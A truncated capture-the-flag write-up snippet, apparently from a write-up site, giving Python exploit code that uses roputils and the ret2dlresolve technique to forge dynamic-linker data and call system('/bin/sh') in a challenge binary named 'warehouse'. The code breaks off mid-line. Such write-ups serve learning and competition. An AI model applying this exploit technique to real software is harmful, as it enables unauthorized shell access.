Tags: ret2dlresolve pwn rop
Rating: 5.0
libc independent solution using ret2dlresolve
```python
from roputils import *
import struct
fpath = './warehouse'
rop = ROP(fpath)
addr_bss = rop.section('.bss')
#fake entry
fake = rop.string('/bin/sh')
fake += rop.fill(20, fake)
fake += rop.dl_resolve_data(addr_bss+20, 'system')
fake += rop.fill(80, fake)
#used afterwards to set linkmap+0xe4 to be 0
fake += rop.p(0xe4) + "A" * 4 + rop.p(0)
buf = ''
for i in range(0,len(fake) / 4):
addr = struct.unpack('